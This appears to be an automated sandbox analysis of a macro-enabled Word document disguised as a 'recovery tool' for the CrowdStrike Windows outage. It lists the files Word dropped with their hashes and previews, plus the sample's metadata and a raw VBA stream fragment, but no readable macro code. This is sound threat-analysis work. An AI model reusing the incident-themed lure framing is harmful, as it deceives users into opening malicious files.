    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):332
    Entropy (8bit):3.547857457374301
    Encrypted:false
    SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
    MD5:4EC6724CBBA516CF202A6BD17226D02C
    SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
    SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
    SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
    Category:dropped
    Size (bytes):284415
    Entropy (8bit):5.00549404077789
    Encrypted:false
    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
    MD5:33A829B4893044E1851725F4DAF20271
    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):374
    Entropy (8bit):3.5414485333689694
    Encrypted:false
    SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
    MD5:2F7A8FE4E5046175500AFFA228F99576
    SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
    SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
    SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):47296
    Entropy (8bit):6.42327948041841
    Encrypted:false
    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
    MD5:5A53F55DD7DA8F10A8C0E711F548B335
    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
    Malicious:false
    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):332
    Entropy (8bit):3.4871192480632223
    Encrypted:false
    SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
    MD5:333BA58FCE326DEA1E4A9DE67475AA95
    SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
    SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
    SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):254875
    Entropy (8bit):5.003842588822783
    Encrypted:false
    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
    MD5:377B3E355414466F3E3861BCE1844976
    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):262
    Entropy (8bit):3.4901887319218092
    Encrypted:false
    SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
    MD5:52BD0762F3DC77334807DDFC60D5F304
    SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
    SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
    SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):5596
    Entropy (8bit):7.875182123405584
    Encrypted:false
    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
    MD5:CDC1493350011DB9892100E94D5592FE
    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
    Malicious:false
    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):274
    Entropy (8bit):3.438490642908344
    Encrypted:false
    SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
    MD5:0F98498818DC28E82597356E2650773C
    SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
    SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
    SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):34415
    Entropy (8bit):7.352974342178997
    Encrypted:false
    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
    MD5:7CDFFC23FB85AD5737452762FA36AAA0
    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
    Malicious:false
    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5161159456784024
    Encrypted:false
    SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
    MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
    SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
    SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
    SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):344303
    Entropy (8bit):5.023195898304535
    Encrypted:false
    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
    MD5:F079EC5E2CCB9CD4529673BCDFB90486
    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):260
    Entropy (8bit):3.4895685222798054
    Encrypted:false
    SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
    MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
    SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
    SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
    SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):3075
    Entropy (8bit):7.716021191059687
    Encrypted:false
    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
    MD5:67766FF48AF205B771B53AA2FA82B4F4
    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
    Malicious:false
    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):777647
    Entropy (8bit):7.689662652914981
    Encrypted:false
    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
    MD5:B30D2EF0FC261AECE90B62E9C5597379
    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
    Malicious:false
    Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5091498509646044
    Encrypted:false
    SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
    MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
    SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
    SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
    SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
    Malicious:false
    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
    File type:Microsoft Word 2007+
    Entropy (8bit):7.938940748289286
    TrID:
    • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
    • Word Microsoft Office Open XML Format document (49504/1) 36.13%
    • Word Microsoft Office Open XML Format document (27504/1) 20.07%
    • ZIP compressed archive (8000/1) 5.84%
    File name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    File size:310'160 bytes
    MD5:dd2100dfa067caae416b885637adc4ef
    SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
    SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
    SHA512:809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
    SSDEEP:6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
    TLSH:1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
    File Content Preview:PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................
    Icon Hash:1d35646ca6a49919
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:True
    Author:Le Nho Thanh
    Template:Normal.dotm
    Last Saved By:David
    Revion Number:3
    Total Edit Time:4
    Create Time:2024-07-19T10:29:00Z
    Last Saved Time:2024-07-22T09:13:00Z
    Number of Pages:9
    Number of Words:2526
    Number of Characters:14404
    Creating Application:Microsoft Office Word
    Security:0
    Number of Lines:120
    Number of Paragraphs:33
    Thumbnail Scaling Desired:false
    Company:Microsoft
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:16.0000
    General
    Stream Path:VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:27601
    Data ASCII:. . . . . . . . . t . . . . . . b . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . $ X . E - . B / . 8 [ . a i s . B e 2 . . . . . . . . . . . . . . . . . . . . Z . L Z . i F Z Z g 6 . . . . . . . . . . . . . . . . . . . . . . x . . . . Z . L Z . i F Z Z g 6 $ X . E - . B / . 8 [ . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . S " . . . . S . . . . . S " . . . . . < 2 . . . . . > " . . . . . < X . . . . . . . . . . . . . . . . . . L . . . .
    Data Raw:01 16 03 00 04 00 01 00 00 74 0b 00 00 e4 00 00 00 62 02 00 00 02 0c 00 00 10 0c 00 00 e0 5d 00 00 04 00 00 00 01 00 00 00 97 d9 f8 db 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 58 0c 45 2d c6 bb 42 af 2f 07 e1 38 5b 0b 81 c3 61 69 73 c0 cd b3 42 91 9f a4 ef 65 97 32 fe 00 00 00 00 00 00 00 00 00 00 00 00 00

    General
    Stream Path:PROJECT
    CLSID:
    File Type:ASCII text, with CRLF line terminators
    Stream Size:376
    Entropy:5.349004928853029
    Base64 Encoded:True
